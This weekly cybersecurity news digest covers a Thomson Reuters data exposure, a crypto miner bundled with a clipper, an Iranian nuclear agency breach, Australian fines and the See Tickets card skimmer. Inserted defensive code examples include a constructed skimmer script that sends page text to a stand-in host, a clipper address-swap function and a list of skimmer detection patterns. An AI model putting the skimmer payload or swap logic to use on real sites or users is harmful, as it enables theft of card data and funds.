
3 TB data leak at Thomson Reuters, double attacks on crypto holders, and other cybersecurity developments


We have compiled the week’s most important cybersecurity news.

  • Thomson Reuters suffered a 3 TB data leak.
  • Attackers carried out a series of double attacks on cryptocurrency holders.
  • See Tickets disclosed a credit-card theft that lasted 2.5 years.
  • Australia announced a 22-fold increase in penalties for corporations for data breaches.

Thomson Reuters suffered a 3 TB data leak

The media and information conglomerate Thomson Reuters disclosed a leak of nearly 3 TB of confidential client and corporate data after three databases were left exposed to the internet without authentication. The incident was reported by researchers at Cybernews.

According to them, the files were stored unencrypted and consisted of registration data collected during interactions with clients.

Timestamps on the samples obtained by the researchers indicated the data were current, with some entries dated as recently as October 26, 2022.

The leak also contains documents with corporate and legal information about specific companies and individuals.

One of the exposed databases included an internal audit of other platforms, such as YouTube, Thomson Reuters’ access logs, and connection strings to other databases.

According to experts, exposing connection strings is particularly dangerous: they typically embed the hostname, database name and the credentials used to authenticate, so an attacker could use them to log in to the referenced databases directly and pivot further into the Reuters internal network.

Researchers also found password-reset and sign-in logs. Without exposing old or new passwords, the logs reveal the account owner’s email address and the exact time a password-change request was submitted.

Data: Cybernews.
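Connection strings and password-reset records are exactly the kind of data that leaks when raw application logs are dumped into an unprotected database. The following added example, which is not code from Cybernews or Thomson Reuters, shows a check a team can run before logs or database exports leave a trusted system: it finds credential-bearing connection strings in both URL form (`scheme://user:pass@host`) and key/value form (`...;Password=...;`) and redacts the secret while keeping the host, so the record stays useful for operations. The log lines and passwords are constructed for the example.

```python
import re

# Constructed sample log lines (not from the real incident); hosts and passwords are made up.
SAMPLE_LOG = """\
2022-10-26T10:12:03Z INFO app connecting with Server=db01.internal;Database=audit;User Id=svc_audit;Password=Hunter2!;
2022-10-26T10:12:04Z DEBUG cache url=redis://:s3cr3t@cache01.internal:6379/0
2022-10-26T10:12:05Z INFO report mongodb://reporter:Pa55w.rd@mongo01.internal:27017/reports?authSource=admin
2022-10-26T10:12:06Z INFO healthcheck ok
"""

# URL-style connection string with an embedded password: scheme://user:password@host[:port]
URL_STYLE = re.compile(
    r"\b(?P<scheme>[a-z][a-z0-9+.-]*)://(?P<user>[^:/@\s]*):(?P<pw>[^@\s]+)@(?P<host>[^\s/;]+)",
    re.IGNORECASE,
)
# Key/value-style (ADO.NET, ODBC) connection string fragment: Password=... or Pwd=...
KV_STYLE = re.compile(
    r"(?P<key>\b(?:password|pwd)\s*=\s*)(?P<pw>[^;\s]+)",
    re.IGNORECASE,
)


def find_connection_strings(text):
    """Return (line_no, kind, host_or_key) for every credential-bearing connection string found."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for m in URL_STYLE.finditer(line):
            findings.append((n, "url", m.group("host")))
        for m in KV_STYLE.finditer(line):
            findings.append((n, "kv", m.group("key").split("=")[0].strip()))
    return findings


def redact(text):
    """Replace the password component of each connection string with ***, keeping host and user."""
    text = URL_STYLE.sub(
        lambda m: f"{m.group('scheme')}://{m.group('user')}:***@{m.group('host')}", text
    )
    text = KV_STYLE.sub(lambda m: f"{m.group('key')}***", text)
    return text


if __name__ == "__main__":
    for line_no, kind, where in find_connection_strings(SAMPLE_LOG):
        print(f"line {line_no}: {kind} connection string -> {where}")
    print(redact(SAMPLE_LOG))
```

The patterns are deliberately broad: a false positive costs a glance, while a single missed `Password=` in a log that later lands in an open database hands out working credentials. Anything the scanner flags in a production export is also a credential to rotate, because the log may already have been copied elsewhere.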

After being notified by the researchers, Thomson Reuters immediately closed access to the exposed instances.

According to the company's statement, the exposure affected two public-facing servers and a test server for its ONESOURCE Global Trade Offering product. The company says these contained non-critical information needed for operational support of the platform.

The precise extent of the damage will be determined by the internal investigation now underway.

Attackers carried out a series of double attacks on cryptocurrency holders

Cyble researchers found cryptocurrency-mining malware that also drops a clipper, a component that watches the clipboard and swaps any cryptocurrency wallet address it finds for one controlled by the attackers.

https://twitter.com/AuCyble/status/1584989921970122752

Infection typically begins with a phishing email carrying a malicious attachment, or when the victim downloads mining software from an untrustworthy site.

The clipper is launched simultaneously with the mining process.

Data: Cyble.

It also creates a mutex to ensure only a single instance of the malware runs on the victim's system. The attackers thus use two different malware families to profit from one infection: the miner earns coins on the victim's hardware, and the clipper diverts the victim's own transfers.

The clipper targets various cryptocurrencies, including Bitcoin, Ethereum, XRP, Monero, Zcash, Dogecoin, TRON, Polkadot, Tezos, Cosmos, Cardano, BNB and others.
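A clipper does not need to understand any blockchain; it only needs to recognise the shape of an address (prefix, alphabet, length) so it can pick a replacement of the same currency that the victim's wallet will accept. The added example below, which is not Cyble's code or a sample from the campaign, shows that classification on constructed, non-real addresses, the substitution step operating on clipboard text, and the defensive counterpart: comparing what was copied with what was pasted and flagging a same-family mismatch. Patterns are shape-only (no checksum validation), which is also all a clipper needs.

```python
import re

# Address-shape patterns per coin family: prefix + alphabet + length. Shape only, no checksum.
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{39,59})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "XRP": re.compile(r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$"),
    "XMR": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
    "DOGE": re.compile(r"^D[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}$"),
    "TRX": re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$"),
}

# Constructed addresses that match the shapes above; none of them is a real wallet.
ETH_A = "0x" + "ab" * 20
ETH_B = "0x" + "cd" * 20
BTC_A = "1" + "A" * 33
BTC_B = "1" + "B" * 33
XRP_A = "r" + "N" * 30
XMR_A = "4A" + "B" * 93
DOGE_A = "D5" + "x" * 32
TRX_A = "T" + "9" * 33

# Hypothetical attacker-controlled replacements, one per family the clipper handles.
ATTACKER_WALLETS = {"ETH": ETH_B, "BTC": BTC_B}


def classify_address(text):
    """Return the coin family whose address shape `text` matches, or None for ordinary text."""
    s = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return coin
    return None


def clipper_substitute(clipboard, attacker_wallets):
    """The malware's step: if the clipboard holds a recognised address, hand back the attacker's."""
    coin = classify_address(clipboard)
    if coin is not None and coin in attacker_wallets:
        return attacker_wallets[coin]
    return clipboard


def detect_swap(copied, pasted):
    """Defender's check: same coin family but a different address means the clipboard was tampered."""
    c, p = classify_address(copied), classify_address(pasted)
    return c is not None and c == p and copied.strip() != pasted.strip()


def audit_clipboard_events(events):
    """events: list of (copied, pasted) pairs; return the indices at which a swap was detected."""
    return [i for i, (copied, pasted) in enumerate(events) if detect_swap(copied, pasted)]


# Constructed clipboard history: plain text, an ETH address passed through the clipper, an untouched BTC one.
SAMPLE_EVENTS = [
    ("meeting at 3pm", "meeting at 3pm"),
    (ETH_A, clipper_substitute(ETH_A, ATTACKER_WALLETS)),
    (BTC_A, BTC_A),
]

if __name__ == "__main__":
    for i, (copied, pasted) in enumerate(SAMPLE_EVENTS):
        print(i, classify_address(copied), "SWAPPED" if detect_swap(copied, pasted) else "ok")
```

The practical lesson is in `detect_swap`: the replacement is always a valid-looking address of the same currency, so a glance at the pasted value will not reveal it. Comparing the first and last several characters of the pasted address against the source (or sending a small test transfer first) is the manual version of the same check.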

Hackers breached Iran’s Atomic Energy Organization

The hacktivist group Black Reward claimed responsibility for the breach of Iran’s Atomic Energy Organization, releasing more than 50 GB of data. At the time of writing, the hackers’ Twitter account was suspended.

According to the hackers, the archive contains emails, contracts and construction plans related to Iran’s Bushehr nuclear power plant.

They demanded the release of political prisoners detained during recent protests, threatening to publish documents on Tehran’s nuclear program.

The Iranian government confirmed the incident on Sunday, October 23.

The Atomic Energy Organization of Iran said that a subsidiary's mail server was breached in a foreign attack aimed at exerting media pressure on the Iranian authorities.

The agency added that unauthorized access to the email system led to publication of some letters’ contents on social media, but the data did not contain any sensitive information.

Australia announced a 22-fold increase in penalties for corporations over data breaches

Australian authorities announced tougher penalties for commercial companies that cause user data breaches.

Fines for serious privacy breaches are proposed to rise from A$1.4 million to A$32 million. Corporations could also be fined up to 30% of annual revenue for a given period if that figure exceeds A$32 million.

The amendments will be introduced to Parliament next week.

The proposal comes shortly after major data breaches at Optus and Medibank.

Medibank recently said that the attackers had far broader access to customers' personal information than initially thought. Specifically, the hackers accessed personal data of customers of its subsidiary brand AHM, of all international student clients and of Medibank's own customers, as well as large datasets relating to medical services provided to those customer groups.

Medibank also found cases of data exfiltration and destruction of some information to which the attackers gained access.

See Tickets reveals a credit-card theft spanning 2.5 years

See Tickets, a ticketing services provider, said that a web skimmer injected into its site had let cybercriminals capture customers' payment-card data as it was entered.

The company discovered the breach in April 2021 and investigated with the help of Visa, MasterCard, American Express and Discover. Its findings showed the site had been infected since June 25, 2019.

The malicious JavaScript code was fully removed from the site only on January 8, 2022.
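A skimmer that survives for two and a half years is a script-integrity problem: the checkout page kept serving one more `<script>` than it was supposed to, and nobody was comparing the served page against a known-good baseline. The added example below, which is not See Tickets' code and uses constructed page snapshots rather than the real site, shows the minimal check: inventory every script on the page (external ones by URL, inline ones by SHA-256 of their body), diff against the baseline, and apply a simple heuristic to any new inline script for the pattern a skimmer needs, namely hooking form submission and shipping data to a third party. The hostnames and the injected script are invented for the example.

```python
import hashlib
import re

# Constructed checkout-page snapshots (not the real See Tickets pages); hostnames are made up.
BASELINE_HTML = """\
<html><head>
<script src="https://cdn.example.com/checkout.js"></script>
<script>window.cfg = {currency: "USD"};</script>
</head><body><form id="pay"></form></body></html>
"""

# The same page with a constructed skimmer-style inline script appended to the head.
TAMPERED_HTML = """\
<html><head>
<script src="https://cdn.example.com/checkout.js"></script>
<script>window.cfg = {currency: "USD"};</script>
<script>document.getElementById('pay').addEventListener('submit',function(){new Image().src='https://stats-example.net/c?'+btoa(document.body.innerText)});</script>
</head><body><form id="pay"></form></body></html>
"""

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r'\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# Fragments that together suggest form-hooking plus exfiltration; two or more is worth a look.
SKIMMER_HINTS = ("addEventListener('submit'", "new Image(", "btoa(", "fetch(", "XMLHttpRequest")


def script_inventory(html):
    """Return a set of script identities: external scripts by URL, inline scripts by body hash."""
    inventory = set()
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            inventory.add(f"external:{src.group(1)}")
        else:
            digest = hashlib.sha256(body.strip().encode()).hexdigest()
            inventory.add(f"inline:sha256:{digest}")
    return inventory


def diff_scripts(baseline_html, current_html):
    """Return (added, removed) script identities of the current page relative to the baseline."""
    base, cur = script_inventory(baseline_html), script_inventory(current_html)
    return sorted(cur - base), sorted(base - cur)


def suspicious_inline(html):
    """Return inline script bodies that hit at least two of the skimmer hints."""
    flagged = []
    for attrs, body in SCRIPT_TAG.findall(html):
        if not SRC_ATTR.search(attrs) and sum(hint in body for hint in SKIMMER_HINTS) >= 2:
            flagged.append(body.strip())
    return flagged


if __name__ == "__main__":
    added, removed = diff_scripts(BASELINE_HTML, TAMPERED_HTML)
    print("added:", added)
    print("removed:", removed)
    for body in suspicious_inline(TAMPERED_HTML):
        print("suspicious inline script:", body[:80], "...")
```

In a real deployment the external entries would also be fetched and hashed, since a skimmer can just as easily live in a modified copy of a legitimate third-party file; a Content Security Policy that restricts `connect-src` and `img-src` to known hosts would additionally have blocked the exfiltration request this constructed script makes.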

The leaked customer data included full names, postal codes, card numbers, expiration dates and CVVs.

Social Security numbers, state IDs, and bank account information were not disclosed, as they are not stored in the systems.

See Tickets did not reveal the number of affected customers, nor whether any of the five other domains used by the company in the U.S., Canada and Europe were compromised.

GPS restricted on Russian smartphones

Since around May, some Android smartphone users noticed slow GPS and inaccurate positioning. The issue was studied by an enthusiast going by the nickname KorDen32.

He found that GPS on phones with Qualcomm and MediaTek chips may be deliberately restricted: the chipmakers are blocking access to A-GPS assistance data, which the phone normally downloads over the internet from the chipmaker's servers.

A-GPS supplies the so-called almanac, a rough map of satellite positions for the week. Without it, a phone starting GPS has to scan every visible satellite in search of a usable signal, which slows the time to first fix.

Data: GPSTest.

KorDen32 noted that with a VPN active, a Qualcomm-powered smartphone obtained a satellite fix in only a few seconds.

The enthusiast could not say why chipmakers would restrict assistance data for smartphones in Russia.

Also on ForkLog:

What to read this weekend?

We explain why governments want access to citizens’ correspondence and how this threatens end-to-end encryption.

